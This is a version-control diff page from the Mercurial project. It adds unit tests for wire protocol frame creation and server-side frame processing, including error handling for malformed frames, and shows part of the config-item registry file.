##// END OF EJS Templates
wireproto: implement basic frame reading and processing...
Gregory Szorc -
r37070:8c3c4736 default
parent child Browse files
Show More
@@ -0,0 +1,275 b''
1 from __future__ import absolute_import, print_function
2
3 import unittest
4
5 from mercurial import (
6 util,
7 wireprotoframing as framing,
8 )
9
10 ffs = framing.makeframefromhumanstring
11
12 def makereactor():
13 return framing.serverreactor()
14
15 def sendframes(reactor, gen):
16 """Send a generator of frame bytearray to a reactor.
17
18 Emits a generator of results from ``onframerecv()`` calls.
19 """
20 for frame in gen:
21 frametype, frameflags, framelength = framing.parseheader(frame)
22 payload = frame[framing.FRAME_HEADER_SIZE:]
23 assert len(payload) == framelength
24
25 yield reactor.onframerecv(frametype, frameflags, payload)
26
27 def sendcommandframes(reactor, cmd, args, datafh=None):
28 """Generate frames to run a command and send them to a reactor."""
29 return sendframes(reactor, framing.createcommandframes(cmd, args, datafh))
30
31 class FrameTests(unittest.TestCase):
32 def testdataexactframesize(self):
33 data = util.bytesio(b'x' * framing.DEFAULT_MAX_FRAME_SIZE)
34
35 frames = list(framing.createcommandframes(b'command', {}, data))
36 self.assertEqual(frames, [
37 ffs(b'command-name have-data command'),
38 ffs(b'command-data continuation %s' % data.getvalue()),
39 ffs(b'command-data eos ')
40 ])
41
42 def testdatamultipleframes(self):
43 data = util.bytesio(b'x' * (framing.DEFAULT_MAX_FRAME_SIZE + 1))
44 frames = list(framing.createcommandframes(b'command', {}, data))
45 self.assertEqual(frames, [
46 ffs(b'command-name have-data command'),
47 ffs(b'command-data continuation %s' % (
48 b'x' * framing.DEFAULT_MAX_FRAME_SIZE)),
49 ffs(b'command-data eos x'),
50 ])
51
52 def testargsanddata(self):
53 data = util.bytesio(b'x' * 100)
54
55 frames = list(framing.createcommandframes(b'command', {
56 b'key1': b'key1value',
57 b'key2': b'key2value',
58 b'key3': b'key3value',
59 }, data))
60
61 self.assertEqual(frames, [
62 ffs(b'command-name have-args|have-data command'),
63 ffs(br'command-argument 0 \x04\x00\x09\x00key1key1value'),
64 ffs(br'command-argument 0 \x04\x00\x09\x00key2key2value'),
65 ffs(br'command-argument eoa \x04\x00\x09\x00key3key3value'),
66 ffs(b'command-data eos %s' % data.getvalue()),
67 ])
68
69 class ServerReactorTests(unittest.TestCase):
70 def _sendsingleframe(self, reactor, s):
71 results = list(sendframes(reactor, [ffs(s)]))
72 self.assertEqual(len(results), 1)
73
74 return results[0]
75
76 def assertaction(self, res, expected):
77 self.assertIsInstance(res, tuple)
78 self.assertEqual(len(res), 2)
79 self.assertIsInstance(res[1], dict)
80 self.assertEqual(res[0], expected)
81
82 def test1framecommand(self):
83 """Receiving a command in a single frame yields request to run it."""
84 reactor = makereactor()
85 results = list(sendcommandframes(reactor, b'mycommand', {}))
86 self.assertEqual(len(results), 1)
87 self.assertaction(results[0], 'runcommand')
88 self.assertEqual(results[0][1], {
89 'command': b'mycommand',
90 'args': {},
91 'data': None,
92 })
93
94 def test1argument(self):
95 reactor = makereactor()
96 results = list(sendcommandframes(reactor, b'mycommand',
97 {b'foo': b'bar'}))
98 self.assertEqual(len(results), 2)
99 self.assertaction(results[0], 'wantframe')
100 self.assertaction(results[1], 'runcommand')
101 self.assertEqual(results[1][1], {
102 'command': b'mycommand',
103 'args': {b'foo': b'bar'},
104 'data': None,
105 })
106
107 def testmultiarguments(self):
108 reactor = makereactor()
109 results = list(sendcommandframes(reactor, b'mycommand',
110 {b'foo': b'bar', b'biz': b'baz'}))
111 self.assertEqual(len(results), 3)
112 self.assertaction(results[0], 'wantframe')
113 self.assertaction(results[1], 'wantframe')
114 self.assertaction(results[2], 'runcommand')
115 self.assertEqual(results[2][1], {
116 'command': b'mycommand',
117 'args': {b'foo': b'bar', b'biz': b'baz'},
118 'data': None,
119 })
120
121 def testsimplecommanddata(self):
122 reactor = makereactor()
123 results = list(sendcommandframes(reactor, b'mycommand', {},
124 util.bytesio(b'data!')))
125 self.assertEqual(len(results), 2)
126 self.assertaction(results[0], 'wantframe')
127 self.assertaction(results[1], 'runcommand')
128 self.assertEqual(results[1][1], {
129 'command': b'mycommand',
130 'args': {},
131 'data': b'data!',
132 })
133
134 def testmultipledataframes(self):
135 frames = [
136 ffs(b'command-name have-data mycommand'),
137 ffs(b'command-data continuation data1'),
138 ffs(b'command-data continuation data2'),
139 ffs(b'command-data eos data3'),
140 ]
141
142 reactor = makereactor()
143 results = list(sendframes(reactor, frames))
144 self.assertEqual(len(results), 4)
145 for i in range(3):
146 self.assertaction(results[i], 'wantframe')
147 self.assertaction(results[3], 'runcommand')
148 self.assertEqual(results[3][1], {
149 'command': b'mycommand',
150 'args': {},
151 'data': b'data1data2data3',
152 })
153
154 def testargumentanddata(self):
155 frames = [
156 ffs(b'command-name have-args|have-data command'),
157 ffs(br'command-argument 0 \x03\x00\x03\x00keyval'),
158 ffs(br'command-argument eoa \x03\x00\x03\x00foobar'),
159 ffs(b'command-data continuation value1'),
160 ffs(b'command-data eos value2'),
161 ]
162
163 reactor = makereactor()
164 results = list(sendframes(reactor, frames))
165
166 self.assertaction(results[-1], 'runcommand')
167 self.assertEqual(results[-1][1], {
168 'command': b'command',
169 'args': {
170 b'key': b'val',
171 b'foo': b'bar',
172 },
173 'data': b'value1value2',
174 })
175
176 def testunexpectedcommandargument(self):
177 """Command argument frame when not running a command is an error."""
178 result = self._sendsingleframe(makereactor(),
179 b'command-argument 0 ignored')
180 self.assertaction(result, 'error')
181 self.assertEqual(result[1], {
182 'message': b'expected command frame; got 2',
183 })
184
185 def testunexpectedcommanddata(self):
186 """Command argument frame when not running a command is an error."""
187 result = self._sendsingleframe(makereactor(),
188 b'command-data 0 ignored')
189 self.assertaction(result, 'error')
190 self.assertEqual(result[1], {
191 'message': b'expected command frame; got 3',
192 })
193
194 def testmissingcommandframeflags(self):
195 """Command name frame must have flags set."""
196 result = self._sendsingleframe(makereactor(),
197 b'command-name 0 command')
198 self.assertaction(result, 'error')
199 self.assertEqual(result[1], {
200 'message': b'missing frame flags on command frame',
201 })
202
203 def testmissingargumentframe(self):
204 frames = [
205 ffs(b'command-name have-args command'),
206 ffs(b'command-name 0 ignored'),
207 ]
208
209 results = list(sendframes(makereactor(), frames))
210 self.assertEqual(len(results), 2)
211 self.assertaction(results[0], 'wantframe')
212 self.assertaction(results[1], 'error')
213 self.assertEqual(results[1][1], {
214 'message': b'expected command argument frame; got 1',
215 })
216
217 def testincompleteargumentname(self):
218 """Argument frame with incomplete name."""
219 frames = [
220 ffs(b'command-name have-args command1'),
221 ffs(br'command-argument eoa \x04\x00\xde\xadfoo'),
222 ]
223
224 results = list(sendframes(makereactor(), frames))
225 self.assertEqual(len(results), 2)
226 self.assertaction(results[0], 'wantframe')
227 self.assertaction(results[1], 'error')
228 self.assertEqual(results[1][1], {
229 'message': b'malformed argument frame: partial argument name',
230 })
231
232 def testincompleteargumentvalue(self):
233 """Argument frame with incomplete value."""
234 frames = [
235 ffs(b'command-name have-args command'),
236 ffs(br'command-argument eoa \x03\x00\xaa\xaafoopartialvalue'),
237 ]
238
239 results = list(sendframes(makereactor(), frames))
240 self.assertEqual(len(results), 2)
241 self.assertaction(results[0], 'wantframe')
242 self.assertaction(results[1], 'error')
243 self.assertEqual(results[1][1], {
244 'message': b'malformed argument frame: partial argument value',
245 })
246
247 def testmissingcommanddataframe(self):
248 frames = [
249 ffs(b'command-name have-data command1'),
250 ffs(b'command-name eos command2'),
251 ]
252 results = list(sendframes(makereactor(), frames))
253 self.assertEqual(len(results), 2)
254 self.assertaction(results[0], 'wantframe')
255 self.assertaction(results[1], 'error')
256 self.assertEqual(results[1][1], {
257 'message': b'expected command data frame; got 1',
258 })
259
260 def testmissingcommanddataframeflags(self):
261 frames = [
262 ffs(b'command-name have-data command1'),
263 ffs(b'command-data 0 data'),
264 ]
265 results = list(sendframes(makereactor(), frames))
266 self.assertEqual(len(results), 2)
267 self.assertaction(results[0], 'wantframe')
268 self.assertaction(results[1], 'error')
269 self.assertEqual(results[1][1], {
270 'message': b'command data frame without flags',
271 })
272
273 if __name__ == '__main__':
274 import silenttestrunner
275 silenttestrunner.main(__name__)
@@ -1,1317 +1,1320 b''
1 # configitems.py - centralized declaration of configuration option
1 # configitems.py - centralized declaration of configuration option
2 #
2 #
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
3 # Copyright 2017 Pierre-Yves David <pierre-yves.david@octobus.net>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import functools
10 import functools
11 import re
11 import re
12
12
13 from . import (
13 from . import (
14 encoding,
14 encoding,
15 error,
15 error,
16 )
16 )
17
17
18 def loadconfigtable(ui, extname, configtable):
18 def loadconfigtable(ui, extname, configtable):
19 """update config item known to the ui with the extension ones"""
19 """update config item known to the ui with the extension ones"""
20 for section, items in sorted(configtable.items()):
20 for section, items in sorted(configtable.items()):
21 knownitems = ui._knownconfig.setdefault(section, itemregister())
21 knownitems = ui._knownconfig.setdefault(section, itemregister())
22 knownkeys = set(knownitems)
22 knownkeys = set(knownitems)
23 newkeys = set(items)
23 newkeys = set(items)
24 for key in sorted(knownkeys & newkeys):
24 for key in sorted(knownkeys & newkeys):
25 msg = "extension '%s' overwrite config item '%s.%s'"
25 msg = "extension '%s' overwrite config item '%s.%s'"
26 msg %= (extname, section, key)
26 msg %= (extname, section, key)
27 ui.develwarn(msg, config='warn-config')
27 ui.develwarn(msg, config='warn-config')
28
28
29 knownitems.update(items)
29 knownitems.update(items)
30
30
31 class configitem(object):
31 class configitem(object):
32 """represent a known config item
32 """represent a known config item
33
33
34 :section: the official config section where to find this item,
34 :section: the official config section where to find this item,
35 :name: the official name within the section,
35 :name: the official name within the section,
36 :default: default value for this item,
36 :default: default value for this item,
37 :alias: optional list of tuples as alternatives,
37 :alias: optional list of tuples as alternatives,
38 :generic: this is a generic definition, match name using regular expression.
38 :generic: this is a generic definition, match name using regular expression.
39 """
39 """
40
40
41 def __init__(self, section, name, default=None, alias=(),
41 def __init__(self, section, name, default=None, alias=(),
42 generic=False, priority=0):
42 generic=False, priority=0):
43 self.section = section
43 self.section = section
44 self.name = name
44 self.name = name
45 self.default = default
45 self.default = default
46 self.alias = list(alias)
46 self.alias = list(alias)
47 self.generic = generic
47 self.generic = generic
48 self.priority = priority
48 self.priority = priority
49 self._re = None
49 self._re = None
50 if generic:
50 if generic:
51 self._re = re.compile(self.name)
51 self._re = re.compile(self.name)
52
52
53 class itemregister(dict):
53 class itemregister(dict):
54 """A specialized dictionary that can handle wild-card selection"""
54 """A specialized dictionary that can handle wild-card selection"""
55
55
56 def __init__(self):
56 def __init__(self):
57 super(itemregister, self).__init__()
57 super(itemregister, self).__init__()
58 self._generics = set()
58 self._generics = set()
59
59
60 def update(self, other):
60 def update(self, other):
61 super(itemregister, self).update(other)
61 super(itemregister, self).update(other)
62 self._generics.update(other._generics)
62 self._generics.update(other._generics)
63
63
64 def __setitem__(self, key, item):
64 def __setitem__(self, key, item):
65 super(itemregister, self).__setitem__(key, item)
65 super(itemregister, self).__setitem__(key, item)
66 if item.generic:
66 if item.generic:
67 self._generics.add(item)
67 self._generics.add(item)
68
68
69 def get(self, key):
69 def get(self, key):
70 baseitem = super(itemregister, self).get(key)
70 baseitem = super(itemregister, self).get(key)
71 if baseitem is not None and not baseitem.generic:
71 if baseitem is not None and not baseitem.generic:
72 return baseitem
72 return baseitem
73
73
74 # search for a matching generic item
74 # search for a matching generic item
75 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
75 generics = sorted(self._generics, key=(lambda x: (x.priority, x.name)))
76 for item in generics:
76 for item in generics:
77 # we use 'match' instead of 'search' to make the matching simpler
77 # we use 'match' instead of 'search' to make the matching simpler
78 # for people unfamiliar with regular expression. Having the match
78 # for people unfamiliar with regular expression. Having the match
79 # rooted to the start of the string will produce less surprising
79 # rooted to the start of the string will produce less surprising
80 # result for user writing simple regex for sub-attribute.
80 # result for user writing simple regex for sub-attribute.
81 #
81 #
82 # For example using "color\..*" match produces an unsurprising
82 # For example using "color\..*" match produces an unsurprising
83 # result, while using search could suddenly match apparently
83 # result, while using search could suddenly match apparently
84 # unrelated configuration that happens to contains "color."
84 # unrelated configuration that happens to contains "color."
85 # anywhere. This is a tradeoff where we favor requiring ".*" on
85 # anywhere. This is a tradeoff where we favor requiring ".*" on
86 # some match to avoid the need to prefix most pattern with "^".
86 # some match to avoid the need to prefix most pattern with "^".
87 # The "^" seems more error prone.
87 # The "^" seems more error prone.
88 if item._re.match(key):
88 if item._re.match(key):
89 return item
89 return item
90
90
91 return None
91 return None
92
92
93 coreitems = {}
93 coreitems = {}
94
94
95 def _register(configtable, *args, **kwargs):
95 def _register(configtable, *args, **kwargs):
96 item = configitem(*args, **kwargs)
96 item = configitem(*args, **kwargs)
97 section = configtable.setdefault(item.section, itemregister())
97 section = configtable.setdefault(item.section, itemregister())
98 if item.name in section:
98 if item.name in section:
99 msg = "duplicated config item registration for '%s.%s'"
99 msg = "duplicated config item registration for '%s.%s'"
100 raise error.ProgrammingError(msg % (item.section, item.name))
100 raise error.ProgrammingError(msg % (item.section, item.name))
101 section[item.name] = item
101 section[item.name] = item
102
102
103 # special value for case where the default is derived from other values
103 # special value for case where the default is derived from other values
104 dynamicdefault = object()
104 dynamicdefault = object()
105
105
106 # Registering actual config items
106 # Registering actual config items
107
107
108 def getitemregister(configtable):
108 def getitemregister(configtable):
109 f = functools.partial(_register, configtable)
109 f = functools.partial(_register, configtable)
110 # export pseudo enum as configitem.*
110 # export pseudo enum as configitem.*
111 f.dynamicdefault = dynamicdefault
111 f.dynamicdefault = dynamicdefault
112 return f
112 return f
113
113
114 coreconfigitem = getitemregister(coreitems)
114 coreconfigitem = getitemregister(coreitems)
115
115
116 coreconfigitem('alias', '.*',
116 coreconfigitem('alias', '.*',
117 default=None,
117 default=None,
118 generic=True,
118 generic=True,
119 )
119 )
120 coreconfigitem('annotate', 'nodates',
120 coreconfigitem('annotate', 'nodates',
121 default=False,
121 default=False,
122 )
122 )
123 coreconfigitem('annotate', 'showfunc',
123 coreconfigitem('annotate', 'showfunc',
124 default=False,
124 default=False,
125 )
125 )
126 coreconfigitem('annotate', 'unified',
126 coreconfigitem('annotate', 'unified',
127 default=None,
127 default=None,
128 )
128 )
129 coreconfigitem('annotate', 'git',
129 coreconfigitem('annotate', 'git',
130 default=False,
130 default=False,
131 )
131 )
132 coreconfigitem('annotate', 'ignorews',
132 coreconfigitem('annotate', 'ignorews',
133 default=False,
133 default=False,
134 )
134 )
135 coreconfigitem('annotate', 'ignorewsamount',
135 coreconfigitem('annotate', 'ignorewsamount',
136 default=False,
136 default=False,
137 )
137 )
138 coreconfigitem('annotate', 'ignoreblanklines',
138 coreconfigitem('annotate', 'ignoreblanklines',
139 default=False,
139 default=False,
140 )
140 )
141 coreconfigitem('annotate', 'ignorewseol',
141 coreconfigitem('annotate', 'ignorewseol',
142 default=False,
142 default=False,
143 )
143 )
144 coreconfigitem('annotate', 'nobinary',
144 coreconfigitem('annotate', 'nobinary',
145 default=False,
145 default=False,
146 )
146 )
147 coreconfigitem('annotate', 'noprefix',
147 coreconfigitem('annotate', 'noprefix',
148 default=False,
148 default=False,
149 )
149 )
150 coreconfigitem('auth', 'cookiefile',
150 coreconfigitem('auth', 'cookiefile',
151 default=None,
151 default=None,
152 )
152 )
153 # bookmarks.pushing: internal hack for discovery
153 # bookmarks.pushing: internal hack for discovery
154 coreconfigitem('bookmarks', 'pushing',
154 coreconfigitem('bookmarks', 'pushing',
155 default=list,
155 default=list,
156 )
156 )
157 # bundle.mainreporoot: internal hack for bundlerepo
157 # bundle.mainreporoot: internal hack for bundlerepo
158 coreconfigitem('bundle', 'mainreporoot',
158 coreconfigitem('bundle', 'mainreporoot',
159 default='',
159 default='',
160 )
160 )
161 # bundle.reorder: experimental config
161 # bundle.reorder: experimental config
162 coreconfigitem('bundle', 'reorder',
162 coreconfigitem('bundle', 'reorder',
163 default='auto',
163 default='auto',
164 )
164 )
165 coreconfigitem('censor', 'policy',
165 coreconfigitem('censor', 'policy',
166 default='abort',
166 default='abort',
167 )
167 )
168 coreconfigitem('chgserver', 'idletimeout',
168 coreconfigitem('chgserver', 'idletimeout',
169 default=3600,
169 default=3600,
170 )
170 )
171 coreconfigitem('chgserver', 'skiphash',
171 coreconfigitem('chgserver', 'skiphash',
172 default=False,
172 default=False,
173 )
173 )
174 coreconfigitem('cmdserver', 'log',
174 coreconfigitem('cmdserver', 'log',
175 default=None,
175 default=None,
176 )
176 )
177 coreconfigitem('color', '.*',
177 coreconfigitem('color', '.*',
178 default=None,
178 default=None,
179 generic=True,
179 generic=True,
180 )
180 )
181 coreconfigitem('color', 'mode',
181 coreconfigitem('color', 'mode',
182 default='auto',
182 default='auto',
183 )
183 )
184 coreconfigitem('color', 'pagermode',
184 coreconfigitem('color', 'pagermode',
185 default=dynamicdefault,
185 default=dynamicdefault,
186 )
186 )
187 coreconfigitem('commands', 'show.aliasprefix',
187 coreconfigitem('commands', 'show.aliasprefix',
188 default=list,
188 default=list,
189 )
189 )
190 coreconfigitem('commands', 'status.relative',
190 coreconfigitem('commands', 'status.relative',
191 default=False,
191 default=False,
192 )
192 )
193 coreconfigitem('commands', 'status.skipstates',
193 coreconfigitem('commands', 'status.skipstates',
194 default=[],
194 default=[],
195 )
195 )
196 coreconfigitem('commands', 'status.verbose',
196 coreconfigitem('commands', 'status.verbose',
197 default=False,
197 default=False,
198 )
198 )
199 coreconfigitem('commands', 'update.check',
199 coreconfigitem('commands', 'update.check',
200 default=None,
200 default=None,
201 # Deprecated, remove after 4.4 release
201 # Deprecated, remove after 4.4 release
202 alias=[('experimental', 'updatecheck')]
202 alias=[('experimental', 'updatecheck')]
203 )
203 )
204 coreconfigitem('commands', 'update.requiredest',
204 coreconfigitem('commands', 'update.requiredest',
205 default=False,
205 default=False,
206 )
206 )
207 coreconfigitem('committemplate', '.*',
207 coreconfigitem('committemplate', '.*',
208 default=None,
208 default=None,
209 generic=True,
209 generic=True,
210 )
210 )
211 coreconfigitem('convert', 'cvsps.cache',
211 coreconfigitem('convert', 'cvsps.cache',
212 default=True,
212 default=True,
213 )
213 )
214 coreconfigitem('convert', 'cvsps.fuzz',
214 coreconfigitem('convert', 'cvsps.fuzz',
215 default=60,
215 default=60,
216 )
216 )
217 coreconfigitem('convert', 'cvsps.logencoding',
217 coreconfigitem('convert', 'cvsps.logencoding',
218 default=None,
218 default=None,
219 )
219 )
220 coreconfigitem('convert', 'cvsps.mergefrom',
220 coreconfigitem('convert', 'cvsps.mergefrom',
221 default=None,
221 default=None,
222 )
222 )
223 coreconfigitem('convert', 'cvsps.mergeto',
223 coreconfigitem('convert', 'cvsps.mergeto',
224 default=None,
224 default=None,
225 )
225 )
226 coreconfigitem('convert', 'git.committeractions',
226 coreconfigitem('convert', 'git.committeractions',
227 default=lambda: ['messagedifferent'],
227 default=lambda: ['messagedifferent'],
228 )
228 )
229 coreconfigitem('convert', 'git.extrakeys',
229 coreconfigitem('convert', 'git.extrakeys',
230 default=list,
230 default=list,
231 )
231 )
232 coreconfigitem('convert', 'git.findcopiesharder',
232 coreconfigitem('convert', 'git.findcopiesharder',
233 default=False,
233 default=False,
234 )
234 )
235 coreconfigitem('convert', 'git.remoteprefix',
235 coreconfigitem('convert', 'git.remoteprefix',
236 default='remote',
236 default='remote',
237 )
237 )
238 coreconfigitem('convert', 'git.renamelimit',
238 coreconfigitem('convert', 'git.renamelimit',
239 default=400,
239 default=400,
240 )
240 )
241 coreconfigitem('convert', 'git.saverev',
241 coreconfigitem('convert', 'git.saverev',
242 default=True,
242 default=True,
243 )
243 )
244 coreconfigitem('convert', 'git.similarity',
244 coreconfigitem('convert', 'git.similarity',
245 default=50,
245 default=50,
246 )
246 )
247 coreconfigitem('convert', 'git.skipsubmodules',
247 coreconfigitem('convert', 'git.skipsubmodules',
248 default=False,
248 default=False,
249 )
249 )
250 coreconfigitem('convert', 'hg.clonebranches',
250 coreconfigitem('convert', 'hg.clonebranches',
251 default=False,
251 default=False,
252 )
252 )
253 coreconfigitem('convert', 'hg.ignoreerrors',
253 coreconfigitem('convert', 'hg.ignoreerrors',
254 default=False,
254 default=False,
255 )
255 )
256 coreconfigitem('convert', 'hg.revs',
256 coreconfigitem('convert', 'hg.revs',
257 default=None,
257 default=None,
258 )
258 )
259 coreconfigitem('convert', 'hg.saverev',
259 coreconfigitem('convert', 'hg.saverev',
260 default=False,
260 default=False,
261 )
261 )
262 coreconfigitem('convert', 'hg.sourcename',
262 coreconfigitem('convert', 'hg.sourcename',
263 default=None,
263 default=None,
264 )
264 )
265 coreconfigitem('convert', 'hg.startrev',
265 coreconfigitem('convert', 'hg.startrev',
266 default=None,
266 default=None,
267 )
267 )
268 coreconfigitem('convert', 'hg.tagsbranch',
268 coreconfigitem('convert', 'hg.tagsbranch',
269 default='default',
269 default='default',
270 )
270 )
271 coreconfigitem('convert', 'hg.usebranchnames',
271 coreconfigitem('convert', 'hg.usebranchnames',
272 default=True,
272 default=True,
273 )
273 )
274 coreconfigitem('convert', 'ignoreancestorcheck',
274 coreconfigitem('convert', 'ignoreancestorcheck',
275 default=False,
275 default=False,
276 )
276 )
277 coreconfigitem('convert', 'localtimezone',
277 coreconfigitem('convert', 'localtimezone',
278 default=False,
278 default=False,
279 )
279 )
280 coreconfigitem('convert', 'p4.encoding',
280 coreconfigitem('convert', 'p4.encoding',
281 default=dynamicdefault,
281 default=dynamicdefault,
282 )
282 )
283 coreconfigitem('convert', 'p4.startrev',
283 coreconfigitem('convert', 'p4.startrev',
284 default=0,
284 default=0,
285 )
285 )
286 coreconfigitem('convert', 'skiptags',
286 coreconfigitem('convert', 'skiptags',
287 default=False,
287 default=False,
288 )
288 )
289 coreconfigitem('convert', 'svn.debugsvnlog',
289 coreconfigitem('convert', 'svn.debugsvnlog',
290 default=True,
290 default=True,
291 )
291 )
292 coreconfigitem('convert', 'svn.trunk',
292 coreconfigitem('convert', 'svn.trunk',
293 default=None,
293 default=None,
294 )
294 )
295 coreconfigitem('convert', 'svn.tags',
295 coreconfigitem('convert', 'svn.tags',
296 default=None,
296 default=None,
297 )
297 )
298 coreconfigitem('convert', 'svn.branches',
298 coreconfigitem('convert', 'svn.branches',
299 default=None,
299 default=None,
300 )
300 )
301 coreconfigitem('convert', 'svn.startrev',
301 coreconfigitem('convert', 'svn.startrev',
302 default=0,
302 default=0,
303 )
303 )
304 coreconfigitem('debug', 'dirstate.delaywrite',
304 coreconfigitem('debug', 'dirstate.delaywrite',
305 default=0,
305 default=0,
306 )
306 )
307 coreconfigitem('defaults', '.*',
307 coreconfigitem('defaults', '.*',
308 default=None,
308 default=None,
309 generic=True,
309 generic=True,
310 )
310 )
311 coreconfigitem('devel', 'all-warnings',
311 coreconfigitem('devel', 'all-warnings',
312 default=False,
312 default=False,
313 )
313 )
314 coreconfigitem('devel', 'bundle2.debug',
314 coreconfigitem('devel', 'bundle2.debug',
315 default=False,
315 default=False,
316 )
316 )
317 coreconfigitem('devel', 'cache-vfs',
317 coreconfigitem('devel', 'cache-vfs',
318 default=None,
318 default=None,
319 )
319 )
320 coreconfigitem('devel', 'check-locks',
320 coreconfigitem('devel', 'check-locks',
321 default=False,
321 default=False,
322 )
322 )
323 coreconfigitem('devel', 'check-relroot',
323 coreconfigitem('devel', 'check-relroot',
324 default=False,
324 default=False,
325 )
325 )
326 coreconfigitem('devel', 'default-date',
326 coreconfigitem('devel', 'default-date',
327 default=None,
327 default=None,
328 )
328 )
329 coreconfigitem('devel', 'deprec-warn',
329 coreconfigitem('devel', 'deprec-warn',
330 default=False,
330 default=False,
331 )
331 )
332 coreconfigitem('devel', 'disableloaddefaultcerts',
332 coreconfigitem('devel', 'disableloaddefaultcerts',
333 default=False,
333 default=False,
334 )
334 )
335 coreconfigitem('devel', 'warn-empty-changegroup',
335 coreconfigitem('devel', 'warn-empty-changegroup',
336 default=False,
336 default=False,
337 )
337 )
338 coreconfigitem('devel', 'legacy.exchange',
338 coreconfigitem('devel', 'legacy.exchange',
339 default=list,
339 default=list,
340 )
340 )
341 coreconfigitem('devel', 'servercafile',
341 coreconfigitem('devel', 'servercafile',
342 default='',
342 default='',
343 )
343 )
344 coreconfigitem('devel', 'serverexactprotocol',
344 coreconfigitem('devel', 'serverexactprotocol',
345 default='',
345 default='',
346 )
346 )
347 coreconfigitem('devel', 'serverrequirecert',
347 coreconfigitem('devel', 'serverrequirecert',
348 default=False,
348 default=False,
349 )
349 )
350 coreconfigitem('devel', 'strip-obsmarkers',
350 coreconfigitem('devel', 'strip-obsmarkers',
351 default=True,
351 default=True,
352 )
352 )
353 coreconfigitem('devel', 'warn-config',
353 coreconfigitem('devel', 'warn-config',
354 default=None,
354 default=None,
355 )
355 )
356 coreconfigitem('devel', 'warn-config-default',
356 coreconfigitem('devel', 'warn-config-default',
357 default=None,
357 default=None,
358 )
358 )
359 coreconfigitem('devel', 'user.obsmarker',
359 coreconfigitem('devel', 'user.obsmarker',
360 default=None,
360 default=None,
361 )
361 )
362 coreconfigitem('devel', 'warn-config-unknown',
362 coreconfigitem('devel', 'warn-config-unknown',
363 default=None,
363 default=None,
364 )
364 )
365 coreconfigitem('devel', 'debug.peer-request',
365 coreconfigitem('devel', 'debug.peer-request',
366 default=False,
366 default=False,
367 )
367 )
368 coreconfigitem('diff', 'nodates',
368 coreconfigitem('diff', 'nodates',
369 default=False,
369 default=False,
370 )
370 )
371 coreconfigitem('diff', 'showfunc',
371 coreconfigitem('diff', 'showfunc',
372 default=False,
372 default=False,
373 )
373 )
374 coreconfigitem('diff', 'unified',
374 coreconfigitem('diff', 'unified',
375 default=None,
375 default=None,
376 )
376 )
377 coreconfigitem('diff', 'git',
377 coreconfigitem('diff', 'git',
378 default=False,
378 default=False,
379 )
379 )
380 coreconfigitem('diff', 'ignorews',
380 coreconfigitem('diff', 'ignorews',
381 default=False,
381 default=False,
382 )
382 )
383 coreconfigitem('diff', 'ignorewsamount',
383 coreconfigitem('diff', 'ignorewsamount',
384 default=False,
384 default=False,
385 )
385 )
386 coreconfigitem('diff', 'ignoreblanklines',
386 coreconfigitem('diff', 'ignoreblanklines',
387 default=False,
387 default=False,
388 )
388 )
389 coreconfigitem('diff', 'ignorewseol',
389 coreconfigitem('diff', 'ignorewseol',
390 default=False,
390 default=False,
391 )
391 )
392 coreconfigitem('diff', 'nobinary',
392 coreconfigitem('diff', 'nobinary',
393 default=False,
393 default=False,
394 )
394 )
395 coreconfigitem('diff', 'noprefix',
395 coreconfigitem('diff', 'noprefix',
396 default=False,
396 default=False,
397 )
397 )
398 coreconfigitem('email', 'bcc',
398 coreconfigitem('email', 'bcc',
399 default=None,
399 default=None,
400 )
400 )
401 coreconfigitem('email', 'cc',
401 coreconfigitem('email', 'cc',
402 default=None,
402 default=None,
403 )
403 )
404 coreconfigitem('email', 'charsets',
404 coreconfigitem('email', 'charsets',
405 default=list,
405 default=list,
406 )
406 )
407 coreconfigitem('email', 'from',
407 coreconfigitem('email', 'from',
408 default=None,
408 default=None,
409 )
409 )
410 coreconfigitem('email', 'method',
410 coreconfigitem('email', 'method',
411 default='smtp',
411 default='smtp',
412 )
412 )
413 coreconfigitem('email', 'reply-to',
413 coreconfigitem('email', 'reply-to',
414 default=None,
414 default=None,
415 )
415 )
416 coreconfigitem('email', 'to',
416 coreconfigitem('email', 'to',
417 default=None,
417 default=None,
418 )
418 )
419 coreconfigitem('experimental', 'archivemetatemplate',
419 coreconfigitem('experimental', 'archivemetatemplate',
420 default=dynamicdefault,
420 default=dynamicdefault,
421 )
421 )
422 coreconfigitem('experimental', 'bundle-phases',
422 coreconfigitem('experimental', 'bundle-phases',
423 default=False,
423 default=False,
424 )
424 )
425 coreconfigitem('experimental', 'bundle2-advertise',
425 coreconfigitem('experimental', 'bundle2-advertise',
426 default=True,
426 default=True,
427 )
427 )
428 coreconfigitem('experimental', 'bundle2-output-capture',
428 coreconfigitem('experimental', 'bundle2-output-capture',
429 default=False,
429 default=False,
430 )
430 )
431 coreconfigitem('experimental', 'bundle2.pushback',
431 coreconfigitem('experimental', 'bundle2.pushback',
432 default=False,
432 default=False,
433 )
433 )
434 coreconfigitem('experimental', 'bundle2.stream',
434 coreconfigitem('experimental', 'bundle2.stream',
435 default=False,
435 default=False,
436 )
436 )
437 coreconfigitem('experimental', 'bundle2lazylocking',
437 coreconfigitem('experimental', 'bundle2lazylocking',
438 default=False,
438 default=False,
439 )
439 )
440 coreconfigitem('experimental', 'bundlecomplevel',
440 coreconfigitem('experimental', 'bundlecomplevel',
441 default=None,
441 default=None,
442 )
442 )
443 coreconfigitem('experimental', 'changegroup3',
443 coreconfigitem('experimental', 'changegroup3',
444 default=False,
444 default=False,
445 )
445 )
446 coreconfigitem('experimental', 'clientcompressionengines',
446 coreconfigitem('experimental', 'clientcompressionengines',
447 default=list,
447 default=list,
448 )
448 )
449 coreconfigitem('experimental', 'copytrace',
449 coreconfigitem('experimental', 'copytrace',
450 default='on',
450 default='on',
451 )
451 )
452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
452 coreconfigitem('experimental', 'copytrace.movecandidateslimit',
453 default=100,
453 default=100,
454 )
454 )
455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
455 coreconfigitem('experimental', 'copytrace.sourcecommitlimit',
456 default=100,
456 default=100,
457 )
457 )
458 coreconfigitem('experimental', 'crecordtest',
458 coreconfigitem('experimental', 'crecordtest',
459 default=None,
459 default=None,
460 )
460 )
461 coreconfigitem('experimental', 'directaccess',
